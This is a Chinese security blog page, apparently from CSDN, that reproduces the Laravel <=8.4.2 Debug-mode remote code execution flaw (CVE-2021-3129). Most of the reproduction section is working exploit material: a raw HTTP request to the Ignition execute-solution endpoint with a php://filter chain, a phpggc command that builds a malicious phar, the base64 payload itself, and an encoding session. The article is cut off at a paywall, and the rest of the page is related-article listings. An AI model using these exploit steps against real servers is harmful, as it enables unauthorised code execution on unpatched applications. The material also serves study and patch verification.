漏洞复现--laravel<=8.4.2 Debug RCE

最新推荐文章于 2023-08-10 10:30:00 发布
最新推荐文章于 2023-08-10 10:30:00 发布
阅读量275 收藏
点赞数
分类专栏: 漏洞复现 代码审计 文章标签: laravel 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nginxx/article/details/121756587
版权

声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本团队无关。

前言

2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

影响范围

laravel <= 8.4.2
Ignition <= 2.5.1
开启debug

CVE编号

CVE-2021-3129

复现步骤

清空 log

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.136.167:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.136.167:8000/_ignition/execute-solution
Content-Type: application/json
Content-Length: 320
Connection: close
Upgrade-Insecure-Requests: 1

{
	"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
	"parameters":{
		"variableName": "username",
		"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/laravel/storage/logs/laravel.log"
	}
}

生成phar文件并base64

php -d'phar.readonly=0' ./phpggc monolog/rce1 call_user_func phpinfo --phar phar -o php://output | base64 -w0

PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C

quoted-printable-encode

Python 3.8.5 (default, Jul 28 2020, 12:59:40) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> a = 'PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C'
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in a]).upper()
'=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=5A=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=0
最低0.47元/天 解锁文章
黑白之间安全团队
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
z.mumu的博客
12-07 1407
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
黑白的博客
05-02 1524
声明 好好学习,天天向上 漏洞描述 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 影响范围 Laravel <= 8.4.2 Ignition <2.5.2 复现过程 这里使用
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 2787
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
laravel5.3使用debug
keial的博客
05-03 1711
原文:https://laravel-news.com/laravel-debugbar 在laravel的project 内 composer require barryvdh/laravel-debugbar 安装好后 在./config/app.php中的providers数组中添加 'Barryvdh\Debugbar\ServiceProvider',然后在
laravel的测试工具debug安装
wgchen
07-14 996
Laravel 开发者工具类 - Laravel-debugbar简介1 安装 Debugbar2 生成配置文件,存放位置 `config/debugbar.php:`3 打开 `config/debugbar.php`,将 enabled 的值设置为: 简介 为了能更直观地看到问题,我们先安装 Laravel 开发者工具类 - laravel-debugbar。 1 安装 Debugbar composer require barryvdh/laravel-debugbar --dev 2 生成配置文件
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
CVE-2021-3129:Laravel <= v8.4.2调试模式
05-10
python3 exp.py http://127.0.0.1:8888[*] Try to use Laravel/RCE1 for exploitation.[+]exploit:[*] Laravel/RCE1 Result:[*] Try to use Laravel/RCE2 for exploitation.[+]exploit:[*] Laravel/RCE2 Result:[*
打印RIP-NeoStampa喷墨印花RIP软件8.4.2.docx
06-25
打印RIP-NeoStampa喷墨印花RIP软件8.4.2 NeoStampa RIP 软件是数字纺织品印花行业的基准,具有易于使用的界面,易于使用,并提供用于图像处理的先进技术。该 RIP软件具有强大的色彩管理引擎以及用于成本控制、图像...
logicaldoc-community-installer-8.4.2.exe
09-06
LogicalDOC是文档管理和协作系统。该软件具有许多功能,可以为任何组织和个人安全安全地组织,索引,检索,控制和分发重要的业务文档。 特征 基于网络的文件管理系统 跨文档内容和元数据的全文搜索 ...
openstack-tripleo-validations-tests-8.4.2-1.el7.noarch.rpm
12-29
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Laravelcookie伪造,解密,和远程命令执行
03-04
下图为CBC模式加密过程下图为CBC模式解密过程Plaintext:明文(P)Ciphertext:密文(C)InitializationVector:初始化向量(IV)Key:密钥(K)LaravelPHP框架中的加密模块存在漏洞,攻击者能够利用该漏洞伪造sessioncookie来实现任意用户登录,在某些情况下,攻击者能够伪造明文对应的密文,并以此来实行远程代码执行。Laravel是一个免费,开源的PHP框架,它为现在的web开发人员提供了很多功能,包括基于cookie的session功能。为了防止攻击者伪造cookie,Laravel会为其加密并带上一个消息认证码(MAC)。当接收到co
Laravel debug bar 调试利器
Mr_Roki的博客
03-15 451
Laravel Debugbar在Laravel 5中集成了PHP Debug Bar,用于显示调试及错误信息以方便开发。扩展该包所有游戏了一个ServiceProvider用于注册调试条以及开发过程中数据集合显示,定向和Ajax请求。QueryCollector:显示所有查询,包含绑定和时间RouteCollector:显示当前路由信息ViewCollector:显示当前加载的视图(可选:显示共享数据)EventsCollector:显示所有事件。
Laravel 如何打开debag
weixin_35749786的博客
12-28 383
Laravel 框架有两种常用的方法来打开调试模式: 在 .env 文件中设置 APP_DEBUG 选项: 可以在 .env 文件中设置 APP_DEBUG 选项来打开调试模式。只需将其设置为 true 即可: APP_DEBUG=true 在 config/app.php 文件中设置 debug 选项: 可以在 config/app.php 文件中设置 debug 选项来打开调试模式。只...
laravel怎么开启调试模式
lxw1844912514的博客
05-17 1万+
在.env文件里有个APP_DEBUG=true,如果是false,改成true就好了。
laravel8学习笔记
weixin_44839274的博客
12-16 962
一.路由 1.基础路由 2.路由参数 有时,你可能需要指定一个路由参数,但你希望这个参数是可选的。你可以在参数后面加上 ? 标记来实现,但前提是要确保路由的相应变量有默认值: Route::get('/user/{name?}', function ($name = null) { return $name; }); Route::get('/user/{name?}', function ($name = 'John') { return $name; }); 3.正则表达式约束
Laravel 漏洞合集
热门推荐
小小猪的博客
08-19 1万+
Laravel 漏洞合集 Laravel 存在SQL注入漏洞 poc: /test?email=1&id=1 union select user()# /test?email=1/`&id=1&column=/ union select user()--+- 可以看的注入成功 Laravel 反序列化漏洞 一. poc: <?php namespace Illuminate\Broadcasting{ use Illuminate\Bus\D...
CVE-2021-3129:Laravel远程代码漏洞复现分析
华为云官方博客
03-17 6696
本文主要为大家带来CVE-2021-3129漏洞复现分析,为大家在日常工作中提供帮助。
Laravel Debug mode 远程代码执行(CVE-2021-3129)
jammny
01-30 3293
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
laravel安装Debugbar调试器的安装和使用
骨子里的偏爱
02-18 793
** laravel安装Debugbar调试器的安装和使用 ** 1.安装命令: composer require barryvdh/laravel-debugbar 2.生成配置文件,给用户配置,根据需求进行配置: PHP artisan vendor:publish --provider="Barryvdh\Debugbar\ServiceProvider" 3.刷新页面,底部显示调试工具,message信息引入如下: use Barryvdh\Debugbar\Facade as DebugB
suitecrm-8.4.2有中文
最新发布
01-23
SuiteCRM是一款开源的客户关系管理软件,最新版本为8.4.2,这个版本包含了中文语言支持。在安装SuiteCRM时,用户可以选择将软件界面显示语言设置为中文,这样就可以以中文显示界面的各种功能和选项。 SuiteCRM的中文界面包括了整个软件的各个模块、菜单、按钮以及提示信息等内容,用户可以方便地使用中文来管理客户信息、进行营销活动、处理客户服务请求等各项业务。 有了中文界面的支持,用户不必担心语言障碍,可以更轻松地使用SuiteCRM进行工作。中文界面的支持也使得那些习惯使用中文的用户能够更快地熟悉和掌握SuiteCRM的使用方法,提高工作效率和用户体验。 总的来说,SuiteCRM-8.4.2 版本包含了中文支持,为使用者提供了更加方便和舒适的体验,使得这个强大的客户关系管理软件能够更好地为中国用户服务。SuiteCRM的不断改进和更新,也表明了其开发团队对用户体验的重视和对全球用户需求的关注。希望SuiteCRM能够继续完善,为用户提供更优质的服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值